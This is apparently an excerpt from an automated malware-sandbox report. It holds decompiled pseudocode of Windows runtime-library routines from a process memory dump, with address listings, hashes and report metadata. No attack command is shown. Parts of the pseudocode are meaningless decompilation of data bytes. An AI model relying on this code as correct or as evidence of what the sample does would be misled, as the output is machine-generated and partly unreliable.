					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = L055C4620(_t288,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t308 = _v32;
							 *(_t326 + 0x3c) = _t280;
							_t282 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t308 - 0x5698478;
								 *_t326 = ((0 | _t308 == 0x05698478) - 0x00000001 & 0xfffffffb) + 7;
								E055EF3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t341 = _t341 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E056339F2(_t321);
									_t308 = _v32;
									_t321 = _t274;
								}
							}
							_t292 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t326 + _t282 * 4;
								_v56 = _t280;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t233 =  *(_v60 + _t292 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t292 * 4);
										 *(_t280 + 0x18) = _t321;
										_t237 =  *(_v60 + _t292 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M055D2959))) {
												case 0:
													__ax =  *0x5698488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E055EF3E0(__edi,  *0x569848c, __ax & 0x0000ffff);
														__eax =  *0x5698488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E055EF3E0(_t321, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x5698480 & 0x0000ffff = E055EF3E0(__edi,  *0x5698484,  *0x5698480 & 0x0000ffff);
													__eax =  *0x5698480 & 0x0000ffff;
													__eax = ( *0x5698480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E055EF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E055EF3E0(_t321, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t321 = _t321 + (_t269 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t321 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0x569575c;
													__eflags = __ebx - 0x569575c;
													if(__ebx != 0x569575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E055EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x569575c;
														} while (__ebx != 0x569575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x5698478 & 0x0000ffff = E055EF3E0(__edi,  *0x569847c,  *0x5698478 & 0x0000ffff);
													__eax =  *0x5698478 & 0x0000ffff;
													__eax = ( *0x5698478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E056339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x5696e58 & 0x0000ffff = E055EF3E0(__edi,  *0x5696e5c,  *0x5696e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x5696e58 & 0x0000ffff;
													__eax = ( *0x5696e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t292 = _v16;
													_t308 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t292 = _t292 + 1;
									_v16 = _t292;
									__eflags = _t292 - _v48;
								} while (_t292 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t319 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M055D2935))) {
							case 0:
								__ax =  *0x5698488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E055D2E3E(0,  &_v64);
								_t280 = _t280 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x5698480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5698480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E055BEEF0(0x56979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E055BEB70(__ecx, 0x56979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t288 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x5697b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E055BEB70(__ecx, 0x56979a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t333;
										_pop(_t281);
										return E055EB640(_t212, _t281, _v8 ^ _t333, _t308, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t276 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t278 = E055D2E3E(_t276,  &_v36);
									_t288 = _v36;
									_v76 = _t278;
								}
								if(_t288 == 0) {
									goto L44;
								} else {
									_t280 = _t280 + 2 + _t288;
								}
								goto L14;
							case 6:
								__eax =  *0x5695764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x5698478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5698478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x5696e58 & 0x0000ffff;
								__eax = ( *0x5696e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("loopne 0x29");
					_a1 = _a1 - _t280;
					_t284 = 0x25;
					asm("popad");
					_a1 = _a1 - _t284;
					 *(_t237 + 0x2f1cd44e ^ 0x0205615b) =  *(_t237 + 0x2f1cd44e ^ 0x0205615b) - 0x5d;
					_push(ds);
					_a1 = _a1 - _t284;
					_t330 = _t326 + 1 - 1;
					_a1 = _a1 - _t284;
					asm("daa");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x567ff00);
					E055FD08C(_t284, _t321, _t330);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t285 = _a12;
					__eflags = _t285;
					if(_t285 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t298 = _t251 * 0xc;
							_v48 = _t298;
							__eflags = _t285 -  *((intOrPtr*)(_t298 + 0x5581664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E055EE5C0(_a8,  *((intOrPtr*)(_t298 + 0x5581668)), _t285);
									_t341 = _t341 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t331 = E056251BE(_t285,  *((intOrPtr*)(_v48 + 0x558166c)), _a16, _t322, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t294 = _a4;
								__eflags = _t294;
								if(_t294 != 0) {
									_v36 = _t294;
									__eflags =  *_t294 - _t322;
									if( *_t294 == _t322) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t294;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t294) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t331 = E055D2AE4( &_v36, _a8, _t285, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t294 = _v36;
													goto L75;
												}
											} else {
												_t256 = E055B6600( *(_t310 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t294 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E055D2C50(_t294, _a8, _t285, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E055BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t263 = E055D2AE4( &_v36, _a8, _t285, _a16, _a20, _t331);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E055D2C50(_v36, _a8, _t285, _a16, _a20, _t331, 1);
									}
									_v8 = _t322;
									E055D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t331;
					}
					L70:
					return E055FD0D1(_t249);
				}
				L108:
			}


















































                                                                        0x055d2584
                                                                        0x055d2586
                                                                        0x055d2590
                                                                        0x055d2596
                                                                        0x055d2597
                                                                        0x055d2598
                                                                        0x055d2599
                                                                        0x055d259e
                                                                        0x055d25a4
                                                                        0x055d25a9
                                                                        0x055d25ac
                                                                        0x055d25ae
                                                                        0x055d25b1
                                                                        0x055d25b2
                                                                        0x055d25b5
                                                                        0x055d25b8
                                                                        0x055d25bb
                                                                        0x055d25bc
                                                                        0x055d25bf
                                                                        0x055d25c2
                                                                        0x055d25c5
                                                                        0x055d25c6
                                                                        0x055d25cb
                                                                        0x055d25ce
                                                                        0x055d25d8
                                                                        0x055d25db
                                                                        0x055d25dd
                                                                        0x055d25de
                                                                        0x055d25e1
                                                                        0x055d25e3
                                                                        0x055d25e9
                                                                        0x055d26da
                                                                        0x055d26da
                                                                        0x055d26dd
                                                                        0x055d26e2
                                                                        0x05615b56
                                                                        0x00000000
                                                                        0x055d26e8
                                                                        0x055d26f9
                                                                        0x055d26fb
                                                                        0x055d26fe
                                                                        0x055d2700
                                                                        0x05615b60
                                                                        0x00000000
                                                                        0x055d2706
                                                                        0x055d2706
                                                                        0x055d270a
                                                                        0x055d270a
                                                                        0x055d270d
                                                                        0x055d2713
                                                                        0x055d2716
                                                                        0x055d2718
                                                                        0x055d271c
                                                                        0x055d271e
                                                                        0x05615b6c
                                                                        0x05615b6f
                                                                        0x05615b7f
                                                                        0x05615b89
                                                                        0x05615b8e
                                                                        0x05615b93
                                                                        0x05615b96
                                                                        0x05615b9c
                                                                        0x05615ba0
                                                                        0x05615ba3
                                                                        0x05615bab
                                                                        0x05615bb0
                                                                        0x05615bb3
                                                                        0x05615bb3
                                                                        0x05615ba3
                                                                        0x055d2724
                                                                        0x055d2726
                                                                        0x055d2729
                                                                        0x055d272c
                                                                        0x055d279d
                                                                        0x055d279d
                                                                        0x055d27a0
                                                                        0x055d27a2
                                                                        0x00000000
                                                                        0x055d272e
                                                                        0x055d272e
                                                                        0x055d2731
                                                                        0x055d2734
                                                                        0x055d2734
                                                                        0x055d2736
                                                                        0x05615bc1
                                                                        0x05615bc1
                                                                        0x05615bc4
                                                                        0x00000000
                                                                        0x05615bca
                                                                        0x05615bca
                                                                        0x05615bcd
                                                                        0x00000000
                                                                        0x05615bd3
                                                                        0x00000000
                                                                        0x05615bd3
                                                                        0x05615bcd
                                                                        0x055d273c
                                                                        0x055d273c
                                                                        0x055d2742
                                                                        0x055d2747
                                                                        0x055d274a
                                                                        0x055d274d
                                                                        0x055d2750
                                                                        0x00000000
                                                                        0x055d2756
                                                                        0x055d2756
                                                                        0x00000000
                                                                        0x055d2902
                                                                        0x055d2908
                                                                        0x055d290b
                                                                        0x00000000
                                                                        0x055d2911
                                                                        0x055d291c
                                                                        0x055d2921
                                                                        0x00000000
                                                                        0x055d2921
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2880
                                                                        0x055d2887
                                                                        0x055d288c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2805
                                                                        0x055d280a
                                                                        0x055d2814
                                                                        0x055d2816
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d281e
                                                                        0x055d2821
                                                                        0x055d2823
                                                                        0x00000000
                                                                        0x055d2829
                                                                        0x055d2829
                                                                        0x055d2831
                                                                        0x055d283c
                                                                        0x055d283e
                                                                        0x00000000
                                                                        0x055d283e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d284e
                                                                        0x055d2850
                                                                        0x055d2851
                                                                        0x055d2854
                                                                        0x055d2857
                                                                        0x055d285a
                                                                        0x055d285c
                                                                        0x055d285d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d275d
                                                                        0x055d2761
                                                                        0x00000000
                                                                        0x055d2767
                                                                        0x055d276e
                                                                        0x055d2773
                                                                        0x055d2773
                                                                        0x055d2776
                                                                        0x055d2778
                                                                        0x055d277e
                                                                        0x055d277e
                                                                        0x055d2781
                                                                        0x055d2781
                                                                        0x055d2783
                                                                        0x055d2784
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615bd8
                                                                        0x05615bde
                                                                        0x05615be4
                                                                        0x05615be6
                                                                        0x05615be8
                                                                        0x05615be9
                                                                        0x05615bee
                                                                        0x05615bf8
                                                                        0x05615bff
                                                                        0x05615c01
                                                                        0x05615c04
                                                                        0x05615c07
                                                                        0x05615c0b
                                                                        0x05615c0d
                                                                        0x05615c0d
                                                                        0x05615c15
                                                                        0x05615c18
                                                                        0x05615c1b
                                                                        0x05615c1b
                                                                        0x05615c1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d28c3
                                                                        0x055d28c8
                                                                        0x055d28d2
                                                                        0x055d28d4
                                                                        0x055d28d8
                                                                        0x055d28db
                                                                        0x05615c26
                                                                        0x05615c28
                                                                        0x05615c2d
                                                                        0x05615c2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615c34
                                                                        0x05615c36
                                                                        0x05615c49
                                                                        0x05615c4e
                                                                        0x05615c54
                                                                        0x05615c5b
                                                                        0x05615c5d
                                                                        0x05615c60
                                                                        0x055d2788
                                                                        0x055d2788
                                                                        0x055d278b
                                                                        0x055d278e
                                                                        0x055d278e
                                                                        0x055d278e
                                                                        0x055d2791
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2756
                                                                        0x055d2750
                                                                        0x00000000
                                                                        0x055d2794
                                                                        0x055d2794
                                                                        0x055d2795
                                                                        0x055d2798
                                                                        0x055d2798
                                                                        0x00000000
                                                                        0x055d2734
                                                                        0x055d272c
                                                                        0x055d2700
                                                                        0x055d25ef
                                                                        0x055d25ef
                                                                        0x055d25ef
                                                                        0x055d25f2
                                                                        0x055d25f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d25fe
                                                                        0x00000000
                                                                        0x055d28e6
                                                                        0x055d28ec
                                                                        0x055d28ef
                                                                        0x055d28f5
                                                                        0x055d28f8
                                                                        0x055d28f8
                                                                        0x00000000
                                                                        0x055d28f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2866
                                                                        0x055d2866
                                                                        0x055d2876
                                                                        0x055d2879
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d27e0
                                                                        0x055d27e7
                                                                        0x055d27e9
                                                                        0x055d27eb
                                                                        0x05615afd
                                                                        0x00000000
                                                                        0x05615afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2633
                                                                        0x055d2638
                                                                        0x055d263b
                                                                        0x055d263c
                                                                        0x055d263e
                                                                        0x055d2640
                                                                        0x055d2642
                                                                        0x055d2647
                                                                        0x055d2649
                                                                        0x055d264e
                                                                        0x055d2650
                                                                        0x055d2653
                                                                        0x055d2659
                                                                        0x055d26a2
                                                                        0x055d26a7
                                                                        0x055d26ac
                                                                        0x055d26b2
                                                                        0x05615b11
                                                                        0x05615b15
                                                                        0x05615b17
                                                                        0x00000000
                                                                        0x055d26b8
                                                                        0x055d26b8
                                                                        0x055d26ba
                                                                        0x055d27a6
                                                                        0x055d27a6
                                                                        0x055d27a9
                                                                        0x055d27ab
                                                                        0x055d27b9
                                                                        0x055d27b9
                                                                        0x055d27be
                                                                        0x055d27c1
                                                                        0x055d27c3
                                                                        0x055d27c5
                                                                        0x055d27c7
                                                                        0x05615c74
                                                                        0x05615c79
                                                                        0x05615c79
                                                                        0x055d27c7
                                                                        0x00000000
                                                                        0x055d26c0
                                                                        0x055d26c0
                                                                        0x055d26c3
                                                                        0x055d26c6
                                                                        0x055d26c6
                                                                        0x055d26c9
                                                                        0x055d26c9
                                                                        0x00000000
                                                                        0x055d26c9
                                                                        0x055d26ba
                                                                        0x055d265b
                                                                        0x055d265b
                                                                        0x055d265e
                                                                        0x055d2667
                                                                        0x055d266d
                                                                        0x055d2677
                                                                        0x055d267c
                                                                        0x055d267f
                                                                        0x055d2681
                                                                        0x05615b49
                                                                        0x05615b4e
                                                                        0x055d27cd
                                                                        0x055d27d0
                                                                        0x055d27d1
                                                                        0x055d27d2
                                                                        0x055d27d4
                                                                        0x055d27dd
                                                                        0x055d2687
                                                                        0x055d2687
                                                                        0x055d268a
                                                                        0x055d268b
                                                                        0x055d268e
                                                                        0x055d268f
                                                                        0x055d2691
                                                                        0x055d2696
                                                                        0x055d2698
                                                                        0x055d269d
                                                                        0x055d269f
                                                                        0x00000000
                                                                        0x055d269f
                                                                        0x055d2681
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2846
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2605
                                                                        0x055d260a
                                                                        0x055d260c
                                                                        0x055d2611
                                                                        0x055d2616
                                                                        0x055d2619
                                                                        0x055d2619
                                                                        0x055d261e
                                                                        0x00000000
                                                                        0x055d2624
                                                                        0x055d2627
                                                                        0x055d2627
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615b1f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d2894
                                                                        0x055d289b
                                                                        0x055d289d
                                                                        0x055d28a1
                                                                        0x05615b2b
                                                                        0x05615b2e
                                                                        0x05615b2e
                                                                        0x055d28a7
                                                                        0x055d28a9
                                                                        0x05615b04
                                                                        0x05615b09
                                                                        0x05615b09
                                                                        0x05615b09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05615b35
                                                                        0x05615b3c
                                                                        0x055d28fb
                                                                        0x055d28fb
                                                                        0x055d26cc
                                                                        0x055d26cc
                                                                        0x055d26d0
                                                                        0x00000000
                                                                        0x055d26d2
                                                                        0x055d26d2
                                                                        0x00000000
                                                                        0x055d26d2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d25fe
                                                                        0x055d292d
                                                                        0x055d2930
                                                                        0x055d2935
                                                                        0x055d293d
                                                                        0x055d2946
                                                                        0x055d294e
                                                                        0x055d294f
                                                                        0x055d295a
                                                                        0x055d295d
                                                                        0x055d2965
                                                                        0x055d2966
                                                                        0x055d2969
                                                                        0x055d296a
                                                                        0x055d296e
                                                                        0x055d297d
                                                                        0x055d297e
                                                                        0x055d297f
                                                                        0x055d2980
                                                                        0x055d2981
                                                                        0x055d2982
                                                                        0x055d2983
                                                                        0x055d2984
                                                                        0x055d2985
                                                                        0x055d2986
                                                                        0x055d2987
                                                                        0x055d2988
                                                                        0x055d2989
                                                                        0x055d298a
                                                                        0x055d298b
                                                                        0x055d298c
                                                                        0x055d298d
                                                                        0x055d298e
                                                                        0x055d298f
                                                                        0x055d2990
                                                                        0x055d2992
                                                                        0x055d2997
                                                                        0x055d29a3
                                                                        0x055d29a6
                                                                        0x055d29ab
                                                                        0x055d29ad
                                                                        0x055d29b0
                                                                        0x055d29b2
                                                                        0x05615c80
                                                                        0x055d29b8
                                                                        0x055d29b8
                                                                        0x055d29bb
                                                                        0x055d29c0
                                                                        0x055d29c5
                                                                        0x055d29c6
                                                                        0x055d29c6
                                                                        0x055d29c9
                                                                        0x055d29cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055d29cd
                                                                        0x055d29d0
                                                                        0x055d29d9
                                                                        0x055d29db
                                                                        0x055d29dd
                                                                        0x055d2a7f
                                                                        0x055d2a84
                                                                        0x055d2a87
                                                                        0x055d2a89
                                                                        0x05615ca1
                                                                        0x05615ca3
                                                                        0x00000000
                                                                        0x055d2a8f
                                                                        0x055d2a8f
                                                                        0x00000000
                                                                        0x055d2a8f
                                                                        0x00000000
                                                                        0x055d29e3
                                                                        0x055d29e3
                                                                        0x055d29e3
                                                                        0x00000000
                                                                        0x055d29e3
                                                                        0x055d29dd
                                                                        0x00000000
                                                                        0x055d29db
                                                                        0x055d29e6
                                                                        0x055d29e9
                                                                        0x055d29eb
                                                                        0x055d29ed
                                                                        0x055d29f3
                                                                        0x055d29f5
                                                                        0x055d29f8
                                                                        0x055d29fa
                                                                        0x055d2a97
                                                                        0x055d2a9a
                                                                        0x055d2a9d
                                                                        0x055d2add
                                                                        0x00000000
                                                                        0x055d2a9f
                                                                        0x055d2aa2
                                                                        0x055d2aa5
                                                                        0x055d2aa8
                                                                        0x055d2aab
                                                                        0x05615cab
                                                                        0x05615caf
                                                                        0x05615cc5
                                                                        0x05615cda
                                                                        0x05615cdc
                                                                        0x05615cdf
                                                                        0x05615ce5
                                                                        0x00000000
                                                                        0x05615ceb
                                                                        0x05615ced
                                                                        0x05615cee
                                                                        0x00000000
                                                                        0x05615cee
                                                                        0x05615cb1
                                                                        0x05615cb4
                                                                        0x05615cb9
                                                                        0x05615cbb
                                                                        0x00000000
                                                                        0x05615cbd
                                                                        0x05615cbd
                                                                        0x00000000
                                                                        0x05615cbd
                                                                        0x05615cbb
                                                                        0x055d2ab1
                                                                        0x055d2ab1
                                                                        0x055d2ac4
                                                                        0x055d2ac6
                                                                        0x055d2ac6
                                                                        0x00000000
                                                                        0x055d2ac6
                                                                        0x055d2aab
                                                                        0x00000000
                                                                        0x055d2a00
                                                                        0x055d2a09
                                                                        0x055d2a0e
                                                                        0x055d2a21
                                                                        0x055d2a24
                                                                        0x055d2a35
                                                                        0x055d2a3a
                                                                        0x055d2a3d
                                                                        0x055d2a42
                                                                        0x055d2a59
                                                                        0x055d2a59
                                                                        0x055d2a5c
                                                                        0x055d2a5f
                                                                        0x055d2a5f
                                                                        0x055d29fa
                                                                        0x055d29f3
                                                                        0x055d2a64
                                                                        0x055d2a64
                                                                        0x055d2a6b
                                                                        0x055d2a6b
                                                                        0x055d2a6d
                                                                        0x055d2a72
                                                                        0x055d2a72
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: 4b1069fcc0da0e32757eef4955c64320c20bd70b9d2bec457d3bc8dfd4efea7d
                                                                        • Instruction ID: 4695b450dbcf82f6ecd712939298df11e54934cb8f336d09932cfe26fb31cc55
                                                                        • Opcode Fuzzy Hash: 4b1069fcc0da0e32757eef4955c64320c20bd70b9d2bec457d3bc8dfd4efea7d
                                                                        • Instruction Fuzzy Hash: 05C182B6E14219DBCB35DF9CD881ABDFBB5FF89710F444419E805AB250DB34A941CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E055DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E055BEEF0(0x5697b60);
					_t134 =  *0x5697b84; // 0x77e07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5697b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5697b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
